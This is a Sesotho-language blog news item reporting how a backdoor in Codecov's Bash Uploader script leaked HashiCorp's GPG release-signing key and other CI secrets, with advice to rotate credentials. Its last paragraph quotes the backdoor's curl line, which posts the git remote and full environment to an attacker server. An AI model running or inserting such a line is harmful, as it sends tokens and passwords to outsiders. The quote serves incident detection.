ProHoster > Blog > litaba tsa inthanete > Ho hlahisoa ha khoutu e mpe ka har'a script ea Codecov ho lebisitse ho sekisetsa ha senotlolo sa HashiCorp PGP.

Ho hlahisoa ha khoutu e mpe ka har'a script ea Codecov ho lebisitse ho sekisetsa ha senotlolo sa HashiCorp PGP.

HashiCorp, e tsejoang ka ho nts'etsapele lisebelisoa tse bulehileng tsa Vagrant, Packer, Nomad le Terraform, e phatlalalitse ho lutla ha senotlolo sa poraefete sa GPG se sebelisetsoang ho theha li-signature tsa dijithale tse netefatsang litokollo. Bahlaseli ba ileng ba fumana senotlolo sa GPG ba ka khona ho etsa liphetoho tse patehileng ho lihlahisoa tsa HashiCorp ka ho li netefatsa ka signature e nepahetseng ea digital. Ka nako e ts'oanang, k'hamphani e boletse hore nakong ea tlhahlobo, ha ho na mesaletsa ea boiteko ba ho etsa liphetoho tse joalo.

Hajoale, senotlolo sa GPG se senyehileng se hlakotsoe 'me senotlolo se secha se hlahisitsoe sebakeng sa sona. Bothata bo amme feela netefatso e sebelisang lifaele tsa SHA256SUM le SHA256SUM.sig, 'me ha ea ka ea ama tlhahiso ea li-signature tsa dijithale bakeng sa Linux DEB le liphutheloana tsa RPM tse fanoeng ka releases.hashicorp.com, hammoho le mekhoa ea ho netefatsa ea ho lokolla bakeng sa macOS le Windows (AuthentiCode) .

Ho dutla ho etsahetse ka lebaka la ts'ebeliso ea sengoloa sa Codecov Bash Uploader (codecov-bash) lits'ebetsong tsa motheo, tse etselitsoeng ho khoasolla litlaleho tsa khaso ho tsoa lits'ebetsong tse tsoelang pele tsa kopanyo. Nakong ea tlhaselo ea k'hamphani ea Codecov, ntlo e ka morao e ne e patiloe ka har'a script e boletsoeng, eo ka eona li-password le linotlolo tsa encryption li rometsoeng ho seva sa bahlaseli.

Ho senya, bahlaseli ba ile ba nka monyetla ka phoso ha ba ntse ba theha setšoantšo sa Codecov Docker, se ileng sa ba lumella ho ntša data ea ho fihlella ho GCS (Google Cloud Storage), e hlokahalang ho etsa liphetoho ho Bash Uploader script e ajoang ho tloha codecov.io websaeteng. Liphetoho li entsoe morao ka la 31 Pherekhong, li ile tsa lula li sa bonoe ka likhoeli tse peli mme tsa lumella bahlaseli ho ntša tlhahisoleseling e bolokiloeng tikolohong ea sistimi e tsoelang pele ea bareki. Ka ho sebelisa khoutu e mpe e kenyellelitsoeng, bahlaseli ba ka fumana tlhahisoleseling mabapi le polokelo ea Git e lekiloeng le mefuta eohle ea tikoloho, ho kenyeletsoa li-tokens, linotlolo tsa encryption le li-password tse fetisetsoang lits'ebetsong tse tsoelang pele tsa ho kopanya ho hlophisa phihlello ea khoutu ea kopo, polokelo le lits'ebeletso tse joalo ka Amazon Web Services le GitHub.

Ntle le pitso e tobileng, script ea Codecov Bash Uploader e ne e sebelisoa e le karolo ea bajari ba bang, joalo ka Codecov-action (Github), Codecov-circleci-orb le Codecov-bitrise-step, eo basebelisi ba eona le bona ba anngoeng ke bothata. Basebelisi bohle ba codecov-bash le lihlahisoa tse amanang le bona ba khothaletsoa ho lekola lits'ebetso tsa bona, hammoho le ho fetola li-password le linotlolo tsa encryption. U ka hlahloba boteng ba backdoor ka har'a script ka ho ba teng ha line curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /upload/v2 | 'nete

Source: opennet.ru

Eketsa ka tlhaloso